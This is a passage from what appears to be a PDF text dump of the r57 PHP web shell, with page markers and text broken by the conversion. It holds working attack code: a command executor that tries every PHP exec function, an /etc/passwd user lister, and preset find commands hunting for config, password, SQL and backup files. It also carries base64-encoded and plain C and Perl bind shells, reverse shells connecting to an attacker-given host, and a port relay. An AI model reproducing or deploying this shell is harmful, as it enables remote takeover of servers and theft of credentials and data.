'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt','find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt','find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -nameadmin.php >> /tmp/grep.txt;cat /tmp/grep.txt','find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*" >> /tmp/grep.txt;cat /tmp/grep.txt','find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt','find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -nameconf.php >> /tmp/grep.txt;cat /tmp/grep.txt','find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -nam

e config.dat >> /tmp/grep.txt;cat /tmp/grep.txt','find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt','find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt','find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f-name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt','find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt','find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*

5/21/2018 r57

22/72

.conf" >> /tmp/grep.txt;cat /tmp/grep.txt','find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt','find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt','find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name"*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt','find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt','-----------------------------------'=>'','find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -t

ype f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt','find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt','find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt','find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt','find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -typef -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt','----------------------------------------------------------------------------------------------------'=>'ls -la');$table_up1 = ":: ";$table_up2 = " ::";$table_up3 = "";$table_end1 = "";$arrow = " 4";$lb = "[";$rb = "]";$font = "";$ts = "";$te = "";$fs = "";$fe = "";

if(isset($_GET['users'])){if(!$users=get_users('/etc/passwd')) {echo "".$lang[$language.'_text96']."";}else{echo '';foreach($users as $user) {echo $user."
";}echo '';}echo "
[ BACK ]";die();}

if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);}else if(@function_exists('chroot')){@chroot($_POST['dir']);};}if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}$unix = 0;if(strlen($dir)>1 &&$dir[1]==":") $unix=0;else $unix=1;if(empty($dir)){$os = getenv('OS');if(empty($os)){$os = @php_uname();}

5/21/2018 r57

23/72

if(empty($os)){$os ="-";$unix=1;}else{if(@eregi("^win",$os)) {$unix = 0;}else {$unix = 1;}}}if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text"){echo $head;

if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);}else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);}$sr->SearchText(0,0);$res = $sr->GetResultFiles();$found = $sr->GetMatchesCount();$titles = $sr->GetTitles();$r = "";if($found >0){$r .= "";foreach($res as $file=>$v){

$r .= "";$r .= "".ws(3);$r .= (!$unix)?str_replace("/","\\",$file) : $file;$r .= "";$r .= "";foreach($v as $a=>$b){$r .= "";$r .= "".$a."";$r .= "".ws(2).$b."";$r .= "\n";}}

$r .= "";echo $r;}else{echo "

".$lang[$language.'_text56']."

";}echo "
[ BACK ]";die();}if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;}

$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";}function ws($i){return @str_repeat("",$i);}function ex($cfe){$res = '';if (!empty($cfe))

5/21/2018 r57

24/72

{if(@function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(@function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(@function_exists('system'))

{@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}

elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";if(@function_exists('fread') &&@function_exists('feof')){while(!@feof($f)) {$res .= @fread($f,1024);}}else if(@function_exists('fgets') &&@function_exists('feof')){while(!@feof($f)) {$res .= @fgets($f,1024);}}@pclose($f);}elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes))){$res = "";

if(@function_exists('fread') &&@function_exists('feof')){while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);}}else if(@function_exists('fgets') &&@function_exists('feof')){while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);}}@proc_close($f);}elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')){$res = '[~] Blind Command Execution via [pcntl_exec]\n\n';$pid = @pcntl_fork();if ($pid == -1) {$res .= '[-] Could not children fork. Exit';

}else if ($pid) {if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}else {$res .= '[-] Error. Command incorrect.';}}else {$cfe = array(" -e 'system(\"$cfe\")'");if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);die();}

5/21/2018 r57

25/72

}}return $res;}function get_users($filename){$users = array();$rows=@explode("\n",readzlib($filename));if(!$rows) return 0;foreach ($rows as $string){

$user = @explode(":",trim($string));if(substr($string,0,1)!='#') array_push($users,$user[0]);}return $users;}function err($n,$txt=''){echo '';echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];if(!empty($txt)) {echo " $txt";}echo '';return null;

}function perms($mode){if (!$GLOBALS['unix']) return 0;if( $mode &0x1000 ) {$type='p';}else if( $mode &0x2000 ) {$type='c';}else if( $mode &0x4000 ) {$type='d';}else if( $mode &0x6000 ) {$type='b';}else if( $mode &0x8000 ) {$type='-';}else if( $mode &0xA000 ) {$type='l';}else if( $mode &0xC000 ) {$type='s';}else $type='u';$owner["read"] = ($mode &00400) ?'r': '-';

$owner["write"] = ($mode &00200) ?'w': '-';$owner["execute"] = ($mode &00100) ?'x': '-';$group["read"] = ($mode &00040) ?'r': '-';$group["write"] = ($mode &00020) ?'w': '-';$group["execute"] = ($mode &00010) ?'x': '-';$world["read"] = ($mode &00004) ?'r': '-';$world["write"] = ($mode &00002) ?'w': '-';$world["execute"] = ($mode &00001) ?'x': '-';if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';$s=sprintf("%1s",$type);$s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);

$s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);$s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);return trim($s);}function in($type,$name,$size,$value,$checked=0){$ret = "

5/21/2018 r57

26/72

return $ret.">";}function which($pr){$path = '';$path = ex("which $pr");if(!empty($path)) {return $path;}else {return false;}}function cf($fname,$text){$w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);

if($w_file){@fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text))or @file_put_contents($fname,@base64_decode($text));@fclose($w_file);}}function sr($l,$t1,$t2){return "".$t1."".$t2."";}if (!@function_exists("view_size"))

{function view_size($size){if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";}elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";}elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";}else {$size = $size ." B";}return $size;}}function DirFilesR($dir,$types=''){$files = Array();

if(($handle = @opendir($dir)) ||(@function_exists('scandir'))){while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir)))){if ($file != "."&&$file != ".."){if(@is_dir($dir."/".$file))$files = @array_merge($files,DirFilesR($dir."/".$file,$types));else{$pos = @strrpos($file,".");$ext = @substr($file,$pos,@strlen($file)-$pos);

if($types){if(@in_array($ext,explode(';',$types)))$files[] = $dir."/".$file;}else$files[] = $dir."/".$file;}}}

5/21/2018 r57

27/72

@closedir($handle);}return $files;}class SearchResult{var $text;var $FilesToSearch;var $ResultFiles;var $FilesTotal;var $MatchesCount;

var $FileMatschesCount;var $TimeStart;var $TimeTotal;var $titles;function SearchResult($dir,$text,$filter=''){$dirs = @explode(";",$dir);$this->FilesToSearch = Array();for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));$this->text = $text;$this->FilesTotal = @count($this->FilesToSearch);

$this->TimeStart = getmicrotime();$this->MatchesCount = 0;$this->ResultFiles = Array();$this->FileMatchesCount = Array();$this->titles = Array();}function GetFilesTotal() {return $this->FilesTotal;}function GetTitles() {return $this->titles;}function GetTimeTotal() {return $this->TimeTotal;}function GetMatchesCount() {return $this->MatchesCount;}function GetFileMatchesCount() {return $this->FileMatchesCount;}function GetResultFiles() {return $this->ResultFiles;}function SearchText($phrase=0,$case=0) {

$qq = @explode(' ',$this->text);$delim = '|';if($phrase)foreach($qq as $k=>$v)$qq[$k] = '\b'.$v.'\b';$words = '('.@implode($delim,$qq).')';$pattern = "/".$words."/";if(!$case)$pattern .= 'i';foreach($this->FilesToSearch as $k=>$filename){$this->FileMatchesCount[$filename] = 0;$FileStrings = @file($filename) or @next;

for($a=0;$a

5/21/2018 r57

28/72

PAN>",$CurString);$this->ResultFiles[$filename][$a+1] = $CurString;$this->MatchesCount += $count;$this->FileMatchesCount[$filename] += $count;}}}$this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);}}function getmicrotime()

{list($usec,$sec) = @explode(" ",@microtime());return ((float)$usec +(float)$sec);}$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0

KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu

dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";/* ?ST SATIRIN KIRILMI? HAL? *//*

#include #include #include #include #include #include

int main(argc,argv)int argc;char **argv;{int sockfd, newfd;char buf[30];struct sockaddr_in remote;if(fork() == 0) {remote.sin_family = AF_INET;remote.sin_port = htons(atoi(argv[1]));

5/21/2018 r57

29/72

remote.sin_addr.s_addr = htonl(INADDR_ANY);sockfd = socket(AF_INET,SOCK_STREAM,0);if(!sockfd) perror("socket error");bind(sockfd, (struct sockaddr *)&remote, 0x10);listen(sockfd, 5);while(1) { newfd=accept(sockfd,0,0); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2);

write(newfd,"Password:",10); read(newfd,buf,sizeof(buf)); if (!chpass(argv[2],buf)) system("echo welcome to r57 shell && /bin/bash -i"); else fprintf(stderr,"Sorry"); close(newfd); }}}int chpass(char *base, char *entered) {int i;for(i=0;i

5/21/2018 r57

30/72

$protocol=getprotobyname('tcp');socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";listen(S,3) || die "Cant listen port\n";while(1){accept(CONN,S);if(!($pid=fork)){die "Cannot fork" if (!defined $pid);

open STDIN,"&CONN";open STDERR,">&CONN";exec $SHELL || die print CONN "Cant execute $SHELL\n";close CONN;exit 0;}}

*/

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj

aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

/* ?ST SATIRIN KIRILMI? HAL? */

/*

#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);

*/

5/21/2018 r57

31/72

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC

Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

/* ?ST SATIRIN KIRILMI? HAL? *//*

#include #include

#include int main(int argc, char *argv[]){int fd;struct sockaddr_in sin;char rms[21]="rm -f ";daemon(1,0);sin.sin_family = AF_INET;sin.sin_port = htons(atoi(argv[2]));sin.sin_addr.s_addr = inet_addr(argv[1]);bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))

5/21/2018 r57

32/72

lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycmxpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAgaW50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRyLCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGVudCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG

9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3RcbiIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1lKGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICAgIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KShhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxhZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ

vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogICAgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7DQogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNhZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jaywyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQ

U5HKSA+IDApOw0KICB9DQogIHJldHVybiAyMDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiAgICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZHIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmludGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC

ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsIE5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykpOw0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHsNCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLGJ1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL

5/21/2018 r57

33/72

CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3JpdGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQogIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZmlsZSk7DQogIHJldHVybiAwOw0KfQ==";

/* ?ST SATIRIN KIRILMI? HAL? *//*

#include #include #include #include #include #include #include #include #include #include #ifdef STRERRORextern char *sys_errlist[];extern int sys_nerr;

char *undef = "Undefined error";char *strerror(error)int error;{if (error > sys_nerr)return undef;return sys_errlist[error];}#endif

main(argc, argv)int argc;char **argv;

{int lsock, csock, osock;

FILE *cfile; char buf[4096]; struct sockaddr_in laddr, caddr, oaddr; int caddrlen = sizeof(caddr); fd_set fdsr, fdse; struct hostent *h; struct servent *s; int nbyt; unsigned long a; unsigned short oport;

if (argc != 4) { fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]); return 30; } a = inet_addr(argv[3]); if (!(h = gethostbyname(argv[3])) && !(h = gethostbyaddr(&a, 4, AF_INET))) { perror(argv[3]); return 25; }

5/21/2018 r57

34/72

oport = atol(argv[2]); laddr.sin_port = htons((unsigned short)(atol(argv[1]))); if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); return 20; } laddr.sin_family = htons(AF_INET); laddr.sin_addr.s_addr = htonl(0); if (bind(lsock, &laddr, sizeof(laddr))) { perror("bind"); return 20;

} if (listen(lsock, 1)) { perror("listen"); return 20; } if ((nbyt = fork()) == -1) { perror("fork"); return 20; } if (nbyt > 0) return 0; setsid(); while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {

cfile = fdopen(csock,"r+"); if ((nbyt = fork()) == -1) { fprintf(cfile, "500 fork: %s\n", strerror(errno)); shutdown(csock,2); fclose(cfile); continue; } if (nbyt == 0) goto gotsock; fclose(cfile); while (waitpid(-1, NULL, WNOHANG) > 0); } return 20;

gotsock: if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(cfile, "500 socket: %s\n", strerror(errno)); goto quit1; } oaddr.sin_family = h->h_addrtype; oaddr.sin_port = htons(oport); memcpy(&oaddr.sin_addr, h->h_addr, h->h_length); if (connect(osock, &oaddr, sizeof(oaddr))) { fprintf(cfile, "500 connect: %s\n", strerror(errno)); goto quit1; }

while (1) { FD_ZERO(&fdsr); FD_ZERO(&fdse); FD_SET(csock,&fdsr); FD_SET(csock,&fdse); FD_SET(osock,&fdsr); FD_SET(osock,&fdse); if (select(20, &fdsr, NULL, &fdse, NULL) == -1) { fprintf(cfile, "500 select: %s\n", strerror(errno)); goto quit2;

5/21/2018 r57

35/72

} if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) { if ((nbyt = read(csock,buf,4096))

5/21/2018 r57

36/72

